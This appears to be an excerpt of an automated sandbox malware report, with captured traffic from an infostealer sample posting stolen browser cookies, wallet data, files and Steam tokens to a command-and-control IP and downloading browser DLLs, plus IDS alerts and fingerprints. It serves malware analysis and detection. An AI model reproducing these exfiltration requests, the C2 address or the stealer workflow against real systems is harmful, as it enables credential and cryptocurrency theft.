                      Source: global trafficHTTP traffic detected: POST /18a9a962225b1ffb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGCAFIIECBFIDHIJKFBHost: 77.83.175.105Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 35 63 66 65 31 32 62 31 37 66 31 38 62 64 34 35 35 65 39 63 31 37 63 37 36 38 32 35 33 31 61 35 35 62 64 66 38 35 64 36 39 32 38 33 30 38 61 37 65 66 64 35 36 61 33 32 35 32 30 32 61 35 66 30 38 66 35 65 63 33 30 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 2d 2d 0d 0a Data Ascii: ------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="token"f5cfe12b17f18bd455e9c17c7682531a55bdf85d6928308a7efd56a325202a5f08f5ec30------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="message"plugins------CBGCAFIIECBFIDHIJKFB--
                      Source: global trafficHTTP traffic detected: POST /18a9a962225b1ffb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKEBFHIJECFIDGDGCGHCHost: 77.83.175.105Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 35 63 66 65 31 32 62 31 37 66 31 38 62 64 34 35 35 65 39 63 31 37 63 37 36 38 32 35 33 31 61 35 35 62 64 66 38 35 64 36 39 32 38 33 30 38 61 37 65 66 64 35 36 61 33 32 35 32 30 32 61 35 66 30 38 66 35 65 63 33 30 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 2d 2d 0d 0a Data Ascii: ------BKEBFHIJECFIDGDGCGHCContent-Disposition: form-data; name="token"f5cfe12b17f18bd455e9c17c7682531a55bdf85d6928308a7efd56a325202a5f08f5ec30------BKEBFHIJECFIDGDGCGHCContent-Disposition: form-data; name="message"fplugins------BKEBFHIJECFIDGDGCGHC--
                      Source: global trafficHTTP traffic detected: POST /18a9a962225b1ffb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKKFCBAKKFBGCBFHJDGHost: 77.83.175.105Content-Length: 6919Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /4db719b1f2f948b0/sqlite3.dll HTTP/1.1Host: 77.83.175.105Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /18a9a962225b1ffb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBKFBFCGIEHIDGCFBFBHost: 77.83.175.105Content-Length: 991Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /18a9a962225b1ffb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBKFBFCGIEHIDGCFBFBHost: 77.83.175.105Content-Length: 991Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 42 46 43 47 49 45 48 49 44 47 43 46 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 35 63 66 65 31 32 62 31 37 66 31 38 62 64 34 35 35 65 39 63 31 37 63 37 36 38 32 35 33 31 61 35 35 62 64 66 38 35 64 36 39 32 38 33 30 38 61 37 65 66 64 35 36 61 33 32 35 32 30 32 61 35 66 30 38 66 35 65 63 33 30 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 42 46 43 47 49 45 48 49 44 47 43 46 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 42 46 43 47 49 45 48 49 44 47 43 46 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 37 49 6d 35 68 62 57 55 69 4f 69 4a 4f 53 55 51 69 4c 43 4a 32 59 57 78 31 5a 53 49 36 49 6a 55 78 4f 44 31 5a 5a 58 46 46 5a 47 39 45 5a 58 68 4e 63 31 49 31 61 33 64 45 59 56 46 51 52 6d 31 52 63 45 4e 53 56 58 52 56 4f 48 52 47 56 46 39 53 63 48 4d 30 62 32 46 4f 4d 6d 74 4d 65 58 4a 47 4d 46 64 4d 54 46 56 32 54 31 42 4d 5a 7a 5a 7a 51 53 30 32 55 6b 68 69 62 6c 5a 51 54 6b 6c 69 64 46 4a 5a 58 30 34 78 5a 46 70 68 4d 44 6b 31 52 6a 6c 34 52 45 74 33 4e 30 34 78 4e 58 4a 68 63 33 4e 6b 4e 53 31 50 4d 32 73 34 4c 54 68 43 4d 6e 70 69 54 57 64 74 55 58 42 4a 61 7a 4e 50 4e 6d 64 68 52 6e 6f 34 63 6b 5a 4d 64 57 4e 72 51 6a 64 31 61 33 6b 35 63 6d 31 73 62 44 52 46 59 32 4a 31 53 57 5a 71 62 57 6c 69 4d 6c 56 51 55 33 68 6f 56 57 35 75 63 30 6f 33 51 6b 35 53 52 56 39 4b 65 58 4e 77 62 6b 49 74 62 6d 4e 42 49 69 77 69 5a 47 39 74 59 57 6c 75 49 6a 6f 69 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 69 4c 43 4a 77 59 58 52 6f 49 6a 6f 69 4c 79 49 73 49 6d 56 34 63 47 6c 79 5a 58 4d 69 4f 6a 45 33 4e 44 55 35 4e 6a 41 31 4d 7a 51 75 4f 54 45 7a 4e 44 49 34 4c 43 4a 7a 61 58 70 6c 49 6a 6f 78 4f 44 55 73 49 6d 68 30 64 48 42 50 62 6d 78 35 49 6a 70 30 63 6e 56 6c 4c 43 4a 7a 5a 57 4e 31 63 6d 55 69 4f 6e 52 79 64 57 55 73 49 6e 4e 6c 63 33 4e 70 62 32 34 69 4f 6d 5a 68 62 48 4e 6c 4c 43 4a 7a 59 57 31 6c 55 32 6c 30 5a 53 49 36 49 6b 35 76 62 6d 55 69 4c 43 4a 77 63 6d 6c 76 63 6d 6c 30 65 53 49 36 49 6b 31 6c 5a 47 6c 31 62 53 49 73 49 6e 4e 68 62 57 56 51 59 58 4a 30 65 53 49 36 5a 6d 46 73 63 32 55 73 49 6e 4e 76 64 58 4a 6a 5a 56 4e 6a 61 47 56 74 5a 53 49 36 49 6c 4e 6c 59 33 56 79 5a 53 49 73
                      Source: global trafficHTTP traffic detected: POST /18a9a962225b1ffb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEHDHIEGIIIDHIDHDHJHost: 77.83.175.105Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 35 63 66 65 31 32 62 31 37 66 31 38 62 64 34 35 35 65 39 63 31 37 63 37 36 38 32 35 33 31 61 35 35 62 64 66 38 35 64 36 39 32 38 33 30 38 61 37 65 66 64 35 36 61 33 32 35 32 30 32 61 35 66 30 38 66 35 65 63 33 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 2d 2d 0d 0a Data Ascii: ------KJEHDHIEGIIIDHIDHDHJContent-Disposition: form-data; name="token"f5cfe12b17f18bd455e9c17c7682531a55bdf85d6928308a7efd56a325202a5f08f5ec30------KJEHDHIEGIIIDHIDHDHJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KJEHDHIEGIIIDHIDHDHJContent-Disposition: form-data; name="file"------KJEHDHIEGIIIDHIDHDHJ--
                      Source: global trafficHTTP traffic detected: POST /18a9a962225b1ffb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAKFCBFHJDHJKECAKEHHost: 77.83.175.105Content-Length: 3087Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /18a9a962225b1ffb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIJJKECFCFBGDHIECAAFHost: 77.83.175.105Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 4a 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 35 63 66 65 31 32 62 31 37 66 31 38 62 64 34 35 35 65 39 63 31 37 63 37 36 38 32 35 33 31 61 35 35 62 64 66 38 35 64 36 39 32 38 33 30 38 61 37 65 66 64 35 36 61 33 32 35 32 30 32 61 35 66 30 38 66 35 65 63 33 30 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 2d 2d 0d 0a Data Ascii: ------FIJJKECFCFBGDHIECAAFContent-Disposition: form-data; name="token"f5cfe12b17f18bd455e9c17c7682531a55bdf85d6928308a7efd56a325202a5f08f5ec30------FIJJKECFCFBGDHIECAAFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FIJJKECFCFBGDHIECAAFContent-Disposition: form-data; name="file"------FIJJKECFCFBGDHIECAAF--
                      Source: global trafficHTTP traffic detected: GET /4db719b1f2f948b0/freebl3.dll HTTP/1.1Host: 77.83.175.105Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /4db719b1f2f948b0/mozglue.dll HTTP/1.1Host: 77.83.175.105Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /4db719b1f2f948b0/msvcp140.dll HTTP/1.1Host: 77.83.175.105Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /4db719b1f2f948b0/nss3.dll HTTP/1.1Host: 77.83.175.105Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /4db719b1f2f948b0/softokn3.dll HTTP/1.1Host: 77.83.175.105Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /4db719b1f2f948b0/vcruntime140.dll HTTP/1.1Host: 77.83.175.105Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /18a9a962225b1ffb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIDGDAKFHIEHJKFHDHDHost: 77.83.175.105Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /18a9a962225b1ffb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAFIJDGHCBFHJKFCGIEHost: 77.83.175.105Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 35 63 66 65 31 32 62 31 37 66 31 38 62 64 34 35 35 65 39 63 31 37 63 37 36 38 32 35 33 31 61 35 35 62 64 66 38 35 64 36 39 32 38 33 30 38 61 37 65 66 64 35 36 61 33 32 35 32 30 32 61 35 66 30 38 66 35 65 63 33 30 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 2d 2d 0d 0a Data Ascii: ------HCAFIJDGHCBFHJKFCGIEContent-Disposition: form-data; name="token"f5cfe12b17f18bd455e9c17c7682531a55bdf85d6928308a7efd56a325202a5f08f5ec30------HCAFIJDGHCBFHJKFCGIEContent-Disposition: form-data; name="message"wallets------HCAFIJDGHCBFHJKFCGIE--
                      Source: global trafficHTTP traffic detected: POST /18a9a962225b1ffb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDHCAAKECFIDHIEBAKHost: 77.83.175.105Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 48 43 41 41 4b 45 43 46 49 44 48 49 45 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 35 63 66 65 31 32 62 31 37 66 31 38 62 64 34 35 35 65 39 63 31 37 63 37 36 38 32 35 33 31 61 35 35 62 64 66 38 35 64 36 39 32 38 33 30 38 61 37 65 66 64 35 36 61 33 32 35 32 30 32 61 35 66 30 38 66 35 65 63 33 30 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 48 43 41 41 4b 45 43 46 49 44 48 49 45 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 48 43 41 41 4b 45 43 46 49 44 48 49 45 42 41 4b 2d 2d 0d 0a Data Ascii: ------AFHDHCAAKECFIDHIEBAKContent-Disposition: form-data; name="token"f5cfe12b17f18bd455e9c17c7682531a55bdf85d6928308a7efd56a325202a5f08f5ec30------AFHDHCAAKECFIDHIEBAKContent-Disposition: form-data; name="message"files------AFHDHCAAKECFIDHIEBAK--
                      Source: global trafficHTTP traffic detected: POST /18a9a962225b1ffb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJEHIDHDAKJDHJKEBFIEHost: 77.83.175.105Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 48 49 44 48 44 41 4b 4a 44 48 4a 4b 45 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 35 63 66 65 31 32 62 31 37 66 31 38 62 64 34 35 35 65 39 63 31 37 63 37 36 38 32 35 33 31 61 35 35 62 64 66 38 35 64 36 39 32 38 33 30 38 61 37 65 66 64 35 36 61 33 32 35 32 30 32 61 35 66 30 38 66 35 65 63 33 30 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 48 49 44 48 44 41 4b 4a 44 48 4a 4b 45 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 48 49 44 48 44 41 4b 4a 44 48 4a 4b 45 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 48 49 44 48 44 41 4b 4a 44 48 4a 4b 45 42 46 49 45 2d 2d 0d 0a Data Ascii: ------IJEHIDHDAKJDHJKEBFIEContent-Disposition: form-data; name="token"f5cfe12b17f18bd455e9c17c7682531a55bdf85d6928308a7efd56a325202a5f08f5ec30------IJEHIDHDAKJDHJKEBFIEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IJEHIDHDAKJDHJKEBFIEContent-Disposition: form-data; name="file"------IJEHIDHDAKJDHJKEBFIE--
                      Source: global trafficHTTP traffic detected: POST /18a9a962225b1ffb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKFCGIJKJKFHIDHIIIEHost: 77.83.175.105Content-Length: 98127Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /18a9a962225b1ffb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKFCFBAAEHCFHJJKEHJKHost: 77.83.175.105Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 46 43 46 42 41 41 45 48 43 46 48 4a 4a 4b 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 35 63 66 65 31 32 62 31 37 66 31 38 62 64 34 35 35 65 39 63 31 37 63 37 36 38 32 35 33 31 61 35 35 62 64 66 38 35 64 36 39 32 38 33 30 38 61 37 65 66 64 35 36 61 33 32 35 32 30 32 61 35 66 30 38 66 35 65 63 33 30 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 43 46 42 41 41 45 48 43 46 48 4a 4a 4b 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 43 46 42 41 41 45 48 43 46 48 4a 4a 4b 45 48 4a 4b 2d 2d 0d 0a Data Ascii: ------AKFCFBAAEHCFHJJKEHJKContent-Disposition: form-data; name="token"f5cfe12b17f18bd455e9c17c7682531a55bdf85d6928308a7efd56a325202a5f08f5ec30------AKFCFBAAEHCFHJJKEHJKContent-Disposition: form-data; name="message"ybncbhylepme------AKFCFBAAEHCFHJJKEHJK--
                      Source: global trafficHTTP traffic detected: POST /18a9a962225b1ffb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHJEBGIEBFIJKEBFBFHHost: 77.83.175.105Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 4a 45 42 47 49 45 42 46 49 4a 4b 45 42 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 35 63 66 65 31 32 62 31 37 66 31 38 62 64 34 35 35 65 39 63 31 37 63 37 36 38 32 35 33 31 61 35 35 62 64 66 38 35 64 36 39 32 38 33 30 38 61 37 65 66 64 35 36 61 33 32 35 32 30 32 61 35 66 30 38 66 35 65 63 33 30 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 4a 45 42 47 49 45 42 46 49 4a 4b 45 42 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 4a 45 42 47 49 45 42 46 49 4a 4b 45 42 46 42 46 48 2d 2d 0d 0a Data Ascii: ------IDHJEBGIEBFIJKEBFBFHContent-Disposition: form-data; name="token"f5cfe12b17f18bd455e9c17c7682531a55bdf85d6928308a7efd56a325202a5f08f5ec30------IDHJEBGIEBFIJKEBFBFHContent-Disposition: form-data; name="message"wkkjqaiaxkhb------IDHJEBGIEBFIJKEBFBFH--
                      Source: Joe Sandbox ViewIP Address: 20.125.209.212 20.125.209.212
                      Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
                      Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
                      Source: Joe Sandbox ViewIP Address: 20.75.60.91 20.75.60.91
                      Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
                      Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                      Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49706 -> 77.83.175.105:80
                      Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49796 -> 77.83.175.105:80
                      Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49875 -> 77.83.175.105:80
                      Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49938 -> 87.106.236.48:443
                      Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49936 version: TLS 1.0
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.83.175.105
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle,0_2_00405000
